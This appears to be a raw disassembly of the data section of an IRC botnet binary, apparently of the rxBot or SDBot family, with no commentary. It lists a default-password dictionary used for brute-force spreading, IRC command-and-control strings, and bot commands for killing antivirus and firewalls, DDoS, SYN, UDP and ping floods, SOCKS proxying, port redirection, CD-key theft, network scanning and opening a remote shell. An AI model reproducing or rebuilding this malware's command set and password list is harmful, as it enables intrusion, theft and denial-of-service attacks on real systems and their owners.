a2003_0 db '2003',0 ; DATA XREF: .data:0043E3FC�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:0043E400�o
align 4
aTest db 'test',0 ; DATA XREF: .data:0043E404�o
align 4
aGuest_1 db 'guest',0 ; DATA XREF: .data:0043E408�o
align 4
aNone db 'none',0 ; DATA XREF: .data:0043E40C�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0043E410�o
align 4
aUnix db 'unix',0 ; DATA XREF: .data:0043E414�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0043E418�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:0043E41C�o
align 10h
aDefault_0 db 'default',0 ; DATA XREF: .data:0043E420�o
aSystem db 'system',0 ; DATA XREF: .data:0043E424�o
align 10h
aServer_4 db 'server',0 ; DATA XREF: .data:0043E428�o
align 4
aRoot_0 db 'root',0 ; DATA XREF: .data:0043E42C�o
align 10h
aNull_1 db 'null',0 ; DATA XREF: .data:0043E430�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:0043E434�o
align 10h
aMail db 'mail',0 ; DATA XREF: .data:0043E438�o
align 4
aOutlook db 'outlook',0 ; DATA XREF: .data:0043E43C�o
aWeb db 'web',0 ; DATA XREF: .data:0043E440�o
aWww db 'www',0 ; DATA XREF: .data:0043E444�o
aInternet db 'internet',0 ; DATA XREF: .data:0043E448�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0043E44C�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: .data:0043E450�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0043E454�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0043E458�o
align 10h
aUser_3 db 'user',0 ; DATA XREF: .data:0043E45C�o
align 4
aOem db 'oem',0 ; DATA XREF: .data:0043E460�o
aOemuser db 'oemuser',0 ; DATA XREF: .data:0043E464�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0043E468�o
align 10h
aWindows db 'windows',0 ; DATA XREF: .data:0043E46C�o
aWin98 db 'win98',0 ; DATA XREF: .data:0043E470�o
align 10h
aWin2k db 'win2k',0 ; DATA XREF: .data:0043E474�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:0043E478�o
align 10h
aWinnt db 'winnt',0 ; DATA XREF: .data:0043E47C�o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: .data:0043E480�o
aQaz db 'qaz',0 ; DATA XREF: .data:0043E484�o
aAsd db 'asd',0 ; DATA XREF: .data:0043E488�o
aZxc db 'zxc',0 ; DATA XREF: .data:0043E48C�o
aQwe db 'qwe',0 ; DATA XREF: .data:0043E490�o
aBob db 'bob',0 ; DATA XREF: .data:0043E494�o
aJen db 'jen',0 ; DATA XREF: .data:0043E498�o
aJoe db 'joe',0 ; DATA XREF: .data:0043E49C�o
aFred db 'fred',0 ; DATA XREF: .data:0043E4A0�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:0043E4A4�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0043E4A8�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:0043E4AC�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0043E4B0�o
align 4
aLuke db 'luke',0 ; DATA XREF: .data:0043E4B4�o
align 4
aSam db 'sam',0 ; DATA XREF: .data:0043E4B8�o
aSue db 'sue',0 ; DATA XREF: .data:0043E4BC�o
aSusan db 'susan',0 ; DATA XREF: .data:0043E4C0�o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: .data:0043E4C4�o
align 4
aBrian db 'brian',0 ; DATA XREF: .data:0043E4C8�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:0043E4CC�o
aNeil db 'neil',0 ; DATA XREF: .data:0043E4D0�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:0043E4D4�o
aChris db 'chris',0 ; DATA XREF: .data:0043E4D8�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:0043E4DC�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:0043E4E0�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:0043E4E4�o
align 4
aBob_0 db 'bob',0 ; DATA XREF: .data:0043E4E8�o
aKatie db 'katie',0 ; DATA XREF: .data:0043E4EC�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:0043E4F0�o
align 10h
aLogin db 'login',0 ; DATA XREF: .data:0043E4F4�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:0043E4F8�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:0043E4FC�o
align 10h
aBackup db 'backup',0 ; DATA XREF: .data:0043E500�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:0043E504�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:0043E508�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:0043E50C�o
align 4
aSlut db 'slut',0 ; DATA XREF: .data:0043E510�o
align 4
aSex db 'sex',0 ; DATA XREF: .data:0043E514�o
aGod db 'god',0 ; DATA XREF: .data:0043E518�o
aHell db 'hell',0 ; DATA XREF: .data:0043E51C�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:0043E520�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:0043E524�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:0043E528�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0043E52C�o
align 4
aDatabase_0 db 'database',0 ; DATA XREF: .data:0043E530�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:0043E534�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:0043E538�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0043E53C�o
align 10h
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:0043E540�o
align 10h
aData db 'data',0 ; DATA XREF: .data:0043E544�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0043E548�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:0043E54C�o
aDb2_0 db 'db2',0 ; DATA XREF: .data:0043E550�o
aDb1234 db 'db1234',0 ; DATA XREF: .data:0043E554�o
align 4
aSa db 'sa',0 ; DATA XREF: .data:0043E558�o
align 10h
aSql db 'sql',0 ; DATA XREF: .data:0043E55C�o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:0043E560�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: .data:0043E564�o
align 4
aOracle_0 db 'oracle',0 ; DATA XREF: .data:0043E568�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:0043E56C�o
aCisco db 'cisco',0 ; DATA XREF: .data:0043E570�o
align 4
aDell db 'dell',0 ; DATA XREF: .data:0043E574�o
align 10h
aCompaq db 'compaq',0 ; DATA XREF: .data:0043E578�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .data:0043E57C�o
aHp db 'hp',0 ; DATA XREF: .data:0043E580�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:0043E584�o
align 4
aXp_1 db 'xp',0 ; DATA XREF: .data:0043E588�o
align 10h
aControl db 'control',0 ; DATA XREF: .data:0043E58C�o
aOffice db 'office',0 ; DATA XREF: .data:0043E590�o
align 10h
aBlank db 'blank',0 ; DATA XREF: .data:0043E594�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .data:0043E598�o
aMain db 'main',0 ; DATA XREF: .data:0043E59C�o
align 4
aLan_0 db 'lan',0 ; DATA XREF: .data:0043E5A0�o
aInternet_0 db 'internet',0 ; DATA XREF: .data:0043E5A4�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .data:0043E5A8�o
align 4
aStudent_0 db 'student',0 ; DATA XREF: .data:0043E5AC�o
aTeacher_0 db 'teacher',0 ; DATA XREF: .data:0043E5B0�o
aStaff_0 db 'staff',0 ; DATA XREF: .data:0043E5B4�o
align 4
aSS_8 db '%s%s',0 ; DATA XREF: sub_40BBCB+10D�o
align 4
aSS_9 db '%s\%s',0 ; DATA XREF: sub_40BBCB+189�o
align 4
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_40BBCB+28F�o
align 4
aMainBotStarted db '[MAIN]: Bot started.',0 ; DATA XREF: sub_40BBCB+364�o
align 10h
aProcsAvFwKille db '[PROCS]: AV/FW Killer active.',0 ; DATA XREF: sub_40BBCB+39F�o
align 10h
aProcsFailedToS db '[PROCS]: Failed to start AV/FW killer thread, error: <%d>.',0
; DATA XREF: sub_40BBCB+3F0�o
align 4
aSecureRegistry db '[SECURE]: Registry monitor active.',0 ; DATA XREF: sub_40BBCB+410�o
align 10h
aSecureFailedTo db '[SECURE]: Failed to start registry thread, error: <%d>.',0
; DATA XREF: sub_40BBCB+463�o
aIdentdServerRu db '[IDENTD]: Server running on Port: 113.',0 ; DATA XREF: sub_40BBCB+490�o
align 10h
aIdentdFailedTo db '[IDENTD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_40BBCB+4DB�o
align 10h
aMainConnectedT db '[MAIN]: Connected to %s.',0 ; DATA XREF: sub_40C22A+F2�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40C392+35�o
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40C392+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
asc_43ED84 db ' :',0 ; DATA XREF: sub_40C50A+86�o
align 4
asc_43ED88: ; DATA XREF: sub_40C50A+AE�o
unicode 0, < >,0
asc_43ED8C: ; DATA XREF: sub_40C50A:loc_40C5D5�o
unicode 0, < >,0
asc_43ED90: ; DATA XREF: sub_40C50A+191�o
unicode 0, <!>,0
aPing db 'PING',0 ; DATA XREF: sub_40C50A+1A0�o
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+1BA�o
align 4
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+1DB�o
align 4
a001 db '001',0 ; DATA XREF: sub_40C50A+1F7�o
a005 db '005',0 ; DATA XREF: sub_40C50A+20C�o
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+62C7�o
align 10h
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+62DC�o
align 10h
aJoinSS_4 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+62EF�o
align 10h
a302 db '302',0 ; DATA XREF: sub_40C50A+221�o
a@: ; DATA XREF: sub_40C50A+231�o
unicode 0, <@>,0
a433 db '433',0 ; DATA XREF: sub_40C50A+25C�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+284�o
align 4
aKick db 'KICK',0 ; DATA XREF: sub_40C50A+2DB�o
align 10h
aMainUserSLogge db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_40C50A+34C�o
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+365�o
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+3AF�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_40C50A+3C2�o
align 4
aSS_10 db ':%s%s',0 ; DATA XREF: sub_40C50A+4E5�o
align 4
aPart db 'PART',0 ; DATA XREF: sub_40C50A+50D�o
align 4
aQuit_0 db 'QUIT',0 ; DATA XREF: sub_40C50A+51E�o
align 4
aMainUserSLog_0 db '[MAIN]: User: %s logged out.',0 ; DATA XREF: sub_40C50A+5B6�o
align 4
aPart_0 db 'PART',0 ; DATA XREF: sub_40C50A+5D3�o
align 4
aNoticeSS_0 db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+5F7�o
a353 db '353',0 ; DATA XREF: sub_40C50A+55F�o
aMainJoinedChan db '[MAIN]: Joined channel: %s.',0 ; DATA XREF: sub_40C50A+596�o
aPrivmsg_0 db 'PRIVMSG',0 ; DATA XREF: sub_40C50A+602�o
aNotice_0 db 'NOTICE',0 ; DATA XREF: sub_40C50A+613�o
align 4
a332 db '332',0 ; DATA XREF: sub_40C50A+624�o
aPrivmsg_1 db 'PRIVMSG',0 ; DATA XREF: sub_40C50A+645�o
aNotice_1 db 'NOTICE',0 ; DATA XREF: sub_40C50A+65A�o
align 4
aNotice_2 db 'NOTICE',0 ; DATA XREF: sub_40C50A+7D5�o
align 10h
asc_43EEF0: ; DATA XREF: sub_40C50A+7FA�o
unicode 0, <#>,0
dword_43EEF4 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_40C50A+882�o
dword_43EF00 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40C50A+8AD�o
dd 0D017325h, 0Ah
dword_43EF1C dd 4E495001h, 47h ; DATA XREF: sub_40C50A+8B8�o
dword_43EF24 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40C50A+8E9�o
dd 0A0Dh
dword_43EF3C dd 43434401h, 0 ; DATA XREF: sub_40C50A+6A4�o
aSend_0 db 'SEND',0 ; DATA XREF: sub_40C50A+6C2�o
align 4
aS_9 db '%s',0 ; DATA XREF: sub_40C50A+6EF�o
align 10h
aS_10 db '%s',0 ; DATA XREF: sub_40C50A+707�o
align 4
aDccReceiveFile db '[DCC]: Receive file: ',27h,'%s',27h,' from user: %s.',0
; DATA XREF: sub_40C50A+768�o
align 10h
aDccFailedToSta db '[DCC]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_40C50A+8FA�o
align 4
aDccReceiveFi_0 db '[DCC]: Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s'
; DATA XREF: sub_40C50A+924�o
db '.',0
align 4
aChat db 'CHAT',0 ; DATA XREF: sub_40C50A+941�o
align 10h
aS_11 db '%s',0 ; DATA XREF: sub_40C50A+97E�o
align 4
aDccChatFromUse db '[DCC]: Chat from user: %s.',0 ; DATA XREF: sub_40C50A+9D8�o
align 10h
aDccFailedToS_0 db '[DCC]: Failed to start chat thread, error: <%d>.',0
; DATA XREF: sub_40C50A+A47�o
align 4
aDccChatAlready db '[DCC]: Chat already active with user: %s.',0
; DATA XREF: sub_40C50A+A58�o
align 10h
aDccChatFailedB db '[DCC]: Chat failed by unauthorized user: %s.',0
; DATA XREF: sub_40C50A+A69�o
align 10h
aHi db 'hi',0 ; DATA XREF: sub_40C50A+A8C�o
align 4
aFr db 'Fr',0 ; DATA XREF: sub_40C50A+AA4�o
align 4
asc_43F0B8: ; DATA XREF: sub_40C50A+6157�o
unicode 0, <!>,0
asc_43F0BC: ; DATA XREF: sub_40C50A+6175�o
unicode 0, <~>,0
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40C50A+61A5�o
align 4
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_40C50A+61B9�o
align 4
aMainFailedPass db '[MAIN]: *Failed pass auth by: (%s!%s).',0 ; DATA XREF: sub_40C50A+61C8�o
align 4
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40C50A+6203�o
align 4
aNoticeSYourA_0 db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_40C50A+6217�o
align 10h
aMainFailedHost db '[MAIN]: *Failed host auth by: (%s!%s).',0 ; DATA XREF: sub_40C50A+6226�o
align 4
aMainPasswordAc db '[MAIN]: Password accepted.',0 ; DATA XREF: sub_40C50A+6296�o
align 4
aMainUserSLog_3 db '[MAIN]: User: %s logged in.',0 ; DATA XREF: sub_40C50A+62B3�o
a332_3 db '332',0 ; DATA XREF: sub_40C50A+AC6�o
asc_43F1F4 db ' :',0 ; DATA XREF: sub_40C50A:loc_40D028�o
align 4
aD db '$%d-',0 ; DATA XREF: sub_40C50A+B7C�o
align 10h
aD_0 db '$%d',0 ; DATA XREF: sub_40C50A+C37�o
aMe db '$me',0 ; DATA XREF: sub_40C50A+CA5�o
aUser_1 db '$user',0 ; DATA XREF: sub_40C50A+CB7�o
align 10h
aChan db '$chan',0 ; DATA XREF: sub_40C50A+CC8�o
align 4
aRndnick db '$rndnick',0 ; DATA XREF: sub_40C50A+CE4�o
align 4
aServer db '$server',0 ; DATA XREF: sub_40C50A+CF5�o
aChr db '$chr(',0 ; DATA XREF: sub_40C50A+D00�o
align 4
aChr_0 db '$chr(',0 ; DATA XREF: sub_40C50A+D19�o
align 4
asc_43F23C: ; DATA XREF: sub_40C50A+D41�o
unicode 0, <)>,0
a63 db '63',0 ; DATA XREF: sub_40C50A+D69�o
align 4
asc_43F244: ; DATA XREF: sub_40C50A+E35�o
unicode 0, < >,0
asc_43F248: ; DATA XREF: sub_40C50A:loc_40D360�o
unicode 0, < >,0
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_40C50A+E90�o
aRn db 'rn',0 ; DATA XREF: sub_40C50A+EA8�o
align 4
aNickS_3 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+6110�o
align 4
aMainRandomNick db '[MAIN]: Random nick change: %s',0 ; DATA XREF: sub_40C50A+6124�o
align 4
aDie db 'die',0 ; DATA XREF: sub_40C50A+EBD�o
aD_1: ; DATA XREF: sub_40C50A+ED2�o
unicode 0, <d>,0
a332_4 db '332',0 ; DATA XREF: sub_40C50A+60C8�o
aLogout db 'logout',0 ; DATA XREF: sub_40C50A+EE7�o
align 4
aLo db 'lo',0 ; DATA XREF: sub_40C50A+EFC�o
align 4
aMainUserSLog_1 db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_40C50A+602D�o
aMainNoUserLogg db '[MAIN]: No user logged in at slot: %d.',0 ; DATA XREF: sub_40C50A+6040�o
align 10h
aMainInvalidLog db '[MAIN]: Invalid login slot number: %d.',0 ; DATA XREF: sub_40C50A+6048�o
align 4
aMainUserSLog_2 db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_40C50A+6084�o
aVersion db 'version',0 ; DATA XREF: sub_40C50A+F11�o
aVer db 'ver',0 ; DATA XREF: sub_40C50A+F26�o
aMainS db '[MAIN]: %s',0 ; DATA XREF: sub_40C50A+5FDF�o
align 4
aSecure db 'secure',0 ; DATA XREF: sub_40C50A+F3B�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_40C50A+F50�o
aUnsecure db 'unsecure',0 ; DATA XREF: sub_40C50A+F65�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_40C50A+F7A�o
align 4
aSecure_2 db 'secure',0 ; DATA XREF: sub_40C50A+5ECE�o
align 4
aSec_0 db 'sec',0 ; DATA XREF: sub_40C50A+5EDF�o
aSecuring db 'Securing',0 ; DATA XREF: sub_40C50A+5F3A�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_40C50A+5F41�o
align 10h
aSecureSSystem_ db '[SECURE]: %s system.',0 ; DATA XREF: sub_40C50A+5F47�o
align 4
aSecureFailed_0 db '[SECURE]: Failed to start secure thread, error: <%d>.',0
; DATA XREF: sub_40C50A+5FC1�o
align 10h
aSocks4 db 'socks4',0 ; DATA XREF: sub_40C50A+F8F�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_40C50A+FA4�o
align 4
aSocks4ServerSt db '[SOCKS4]: Server started on: %s:%d.',0 ; DATA XREF: sub_40C50A+5E54�o
aSocks4FailedTo db '[SOCKS4]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_40C50A+5EC3�o
align 4
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_40C50A+FB9�o
align 4
aServer_0 db 'Server',0 ; DATA XREF: sub_40C50A+FD2�o
align 4
aSocks4_0 db '[SOCKS4]',0 ; DATA XREF: sub_40C50A+FD7�o
align 4
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_40C50A+FE2�o
align 4
aServer_1 db 'Server',0 ; DATA XREF: sub_40C50A+FFB�o
align 4
aRlogind db '[RLOGIND]',0 ; DATA XREF: sub_40C50A+1000�o
align 4
aHttpstop db 'httpstop',0 ; DATA XREF: sub_40C50A+100B�o
align 4
aServer_2 db 'Server',0 ; DATA XREF: sub_40C50A+1024�o
align 4
aHttpd db '[HTTPD]',0 ; DATA XREF: sub_40C50A+1029�o
aLogstop db 'logstop',0 ; DATA XREF: sub_40C50A+1034�o
aLogList db 'Log list',0 ; DATA XREF: sub_40C50A+104D�o
align 4
aLog db '[LOG]',0 ; DATA XREF: sub_40C50A+1052�o
align 10h
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_40C50A+105D�o
align 10h
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_40C50A+1076�o
align 10h
aRedirect db '[REDIRECT]',0 ; DATA XREF: sub_40C50A+107B�o
align 4
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_40C50A+1086�o
align 4
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_40C50A+109F�o
align 4
aDdos db '[DDoS]',0 ; DATA XREF: sub_40C50A+10A4�o
align 4
aSynstop db 'synstop',0 ; DATA XREF: sub_40C50A+10AF�o
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_40C50A+10C8�o
align 10h
aSyn db '[SYN]',0 ; DATA XREF: sub_40C50A+10CD�o
align 4
aUdpstop db 'udpstop',0 ; DATA XREF: sub_40C50A+10D8�o
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_40C50A+10F1�o
align 4
aUpd db '[UPD]',0 ; DATA XREF: sub_40C50A+10F6�o
align 4
aPingstop db 'pingstop',0 ; DATA XREF: sub_40C50A+1101�o
align 10h
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_40C50A+111A�o
align 4
aPing_0 db '[PING]',0 ; DATA XREF: sub_40C50A+111F�o
align 4
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_40C50A+112A�o
align 10h
aServer_3 db 'Server',0 ; DATA XREF: sub_40C50A+1143�o
align 4
aTftp db '[TFTP]',0 ; DATA XREF: sub_40C50A+1148�o
align 10h
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_40C50A+1153�o
align 10h
aFfstop db 'ffstop',0 ; DATA XREF: sub_40C50A+1168�o
align 4
aFindFile db 'Find file',0 ; DATA XREF: sub_40C50A+5D85�o
align 4
aFindfile_0 db '[FINDFILE]',0 ; DATA XREF: sub_40C50A+5D8A�o
align 10h
aProcsstop db 'procsstop',0 ; DATA XREF: sub_40C50A+117D�o
align 4
aPsstop db 'psstop',0 ; DATA XREF: sub_40C50A+1192�o
align 4
aProcessList db 'Process list',0 ; DATA XREF: sub_40C50A+5D70�o
align 4
aProc db '[PROC]',0 ; DATA XREF: sub_40C50A+5D75�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_40C50A+11A7�o
align 4
aClone db 'Clone',0 ; DATA XREF: sub_40C50A+11C0�o
align 10h
aClones db '[CLONES]',0 ; DATA XREF: sub_40C50A+11C5�o
align 4
aSecurestop db 'securestop',0 ; DATA XREF: sub_40C50A+11D0�o
align 4
aSecure_0 db 'Secure',0 ; DATA XREF: sub_40C50A+11E9�o
align 10h
aSecure_1 db '[SECURE]',0 ; DATA XREF: sub_40C50A+11EE�o
align 4
aScanstop db 'scanstop',0 ; DATA XREF: sub_40C50A+11F9�o
align 4
aScan db 'Scan',0 ; DATA XREF: sub_40C50A+1212�o
align 10h
aScan_0 db '[SCAN]',0 ; DATA XREF: sub_40C50A+1217�o
align 4
aScanstats db 'scanstats',0 ; DATA XREF: sub_40C50A+1222�o
align 4
aStats db 'stats',0 ; DATA XREF: sub_40C50A+1237�o
align 4
aReconnect db 'reconnect',0 ; DATA XREF: sub_40C50A+124C�o
align 4
aR_0: ; DATA XREF: sub_40C50A+1261�o
unicode 0, <r>,0
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40C50A:loc_41223A�o
align 4
aMainReconnecti db '[MAIN]: Reconnecting.',0 ; DATA XREF: sub_40C50A+5D3D�o
align 4
aDisconnect db 'disconnect',0 ; DATA XREF: sub_40C50A+1276�o
align 4
aDc db 'dc',0 ; DATA XREF: sub_40C50A+128B�o
align 4
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40C50A:loc_412218�o
align 4
aMainDisconnect db '[MAIN]: Disconnecting.',0 ; DATA XREF: sub_40C50A+5D1B�o
align 4
aQuit_1 db 'quit',0 ; DATA XREF: sub_40C50A+12A0�o
align 4
aQ: ; DATA XREF: sub_40C50A+12B5�o
unicode 0, <q>,0
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40C50A+5CE6�o
align 4
aQuitLater_0 db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40C50A:loc_412202�o
align 4
aStatus db 'status',0 ; DATA XREF: sub_40C50A+12CA�o
align 4
aS_12: ; DATA XREF: sub_40C50A+12DF�o
unicode 0, <s>,0
aMainStatusRead db '[MAIN]: Status: Ready. Bot Uptime: %s.',0 ; DATA XREF: sub_40C50A+5C9A�o
align 4
aId db 'id',0 ; DATA XREF: sub_40C50A+12F4�o
align 4
aI_0: ; DATA XREF: sub_40C50A+1309�o
unicode 0, <i>,0
aMainBotIdS_ db '[MAIN]: Bot ID: %s.',0 ; DATA XREF: sub_40C50A+5C5C�o
aReboot db 'reboot',0 ; DATA XREF: sub_40C50A+131E�o
align 4
aMainRebootingS db '[MAIN]: Rebooting system.',0 ; DATA XREF: sub_40C50A+1335�o
align 4
aMainFailedToRe db '[MAIN]: Failed to reboot system.',0 ; DATA XREF: sub_40C50A+133C�o
align 4
aThreads db 'threads',0 ; DATA XREF: sub_40C50A+1370�o
aT: ; DATA XREF: sub_40C50A+1385�o
unicode 0, <t>,0
aSub db 'sub',0 ; DATA XREF: sub_40C50A+5BA0�o
aThreadsListThr db '[THREADS]: List threads.',0 ; DATA XREF: sub_40C50A+5BC6�o
align 4
aThreadsFaile_0 db '[THREADS]: Failed to start list thread, error: <%d>.',0
; DATA XREF: sub_40C50A+5C31�o
align 10h
aAliases db 'aliases',0 ; DATA XREF: sub_40C50A+139A�o
aAl db 'al',0 ; DATA XREF: sub_40C50A+13AF�o
align 4
aMainAliasList_ db '[MAIN]: Alias list.',0 ; DATA XREF: sub_40C50A+5B51�o
aLog_0 db 'log',0 ; DATA XREF: sub_40C50A+13C4�o
aLg db 'lg',0 ; DATA XREF: sub_40C50A+13D9�o
align 4
aS_36 db '%s',0 ; DATA XREF: sub_40C50A+5A76�o
align 4
aLogListingLog_ db '[LOG]: Listing log.',0 ; DATA XREF: sub_40C50A+5AA9�o
aLogFailedToSta db '[LOG]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_40C50A+5B36�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_40C50A+13EE�o
align 10h
aClg db 'clg',0 ; DATA XREF: sub_40C50A+1403�o
aNetinfo db 'netinfo',0 ; DATA XREF: sub_40C50A+1418�o
aNi db 'ni',0 ; DATA XREF: sub_40C50A+142D�o
align 10h
aMainNetworkInf db '[MAIN]: Network Info.',0 ; DATA XREF: sub_40C50A+5A25�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_40C50A+1442�o
aSi db 'si',0 ; DATA XREF: sub_40C50A+1457�o
align 4
aMainSystemInfo db '[MAIN]: System Info.',0 ; DATA XREF: sub_40C50A+59F6�o
align 4
aRemov10e db 'remov10e',0 ; DATA XREF: sub_40C50A+146C�o
align 4
aRemov10e2 db 'remov10e2',0 ; DATA XREF: sub_40C50A+1481�o
align 4
aMainRemovingBo db '[MAIN]: Removing Bot.',0 ; DATA XREF: sub_40C50A+59A1�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_40C50A+1496�o
align 4
aPs db 'ps',0 ; DATA XREF: sub_40C50A+14AB�o
align 4
aProcAlreadyRun db '[PROC]: Already running.',0 ; DATA XREF: sub_40C50A+589D�o
align 4
aFull db 'full',0 ; DATA XREF: sub_40C50A+58FF�o
align 4
aProcsProccessL db '[PROCS]: Proccess list.',0 ; DATA XREF: sub_40C50A+591F�o
aProcsFailedT_0 db '[PROCS]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_40C50A+598E�o
align 4
aGetcdkeys db 'getcdkeys',0 ; DATA XREF: sub_40C50A+14C0�o
align 4
aKey db 'key',0 ; DATA XREF: sub_40C50A+14D5�o
aCdkeysSearchCo db '[CDKEYS]: Search completed.',0 ; DATA XREF: sub_40C50A+5871�o
aUptime db 'uptime',0 ; DATA XREF: sub_40C50A+14EA�o
align 10h
aUp db 'up',0 ; DATA XREF: sub_40C50A+14FF�o
align 4
aMainUptimeS_ db '[MAIN]: Uptime: %s.',0 ; DATA XREF: sub_40C50A+5825�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_40C50A+1514�o
align 4
aDrv db 'drv',0 ; DATA XREF: sub_40C50A+1529�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_40C50A+153E�o
align 4
aDll db 'dll',0 ; DATA XREF: sub_40C50A+1553�o
aOpencmd db 'opencmd',0 ; DATA XREF: sub_40C50A+1568�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_40C50A+157D�o
align 4
aCmdRemoteShell db '[CMD]: Remote shell already running.',0 ; DATA XREF: sub_40C50A+5765�o
align 10h
aCmdCouldnTOpen db '[CMD]: Couldn',27h,'t open remote shell.',0
; DATA XREF: sub_40C50A+5781�o
align 4
aCmdRemoteShe_0 db '[CMD]: Remote shell ready.',0 ; DATA XREF: sub_40C50A:loc_411C92�o
align 10h
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_40C50A+1592�o
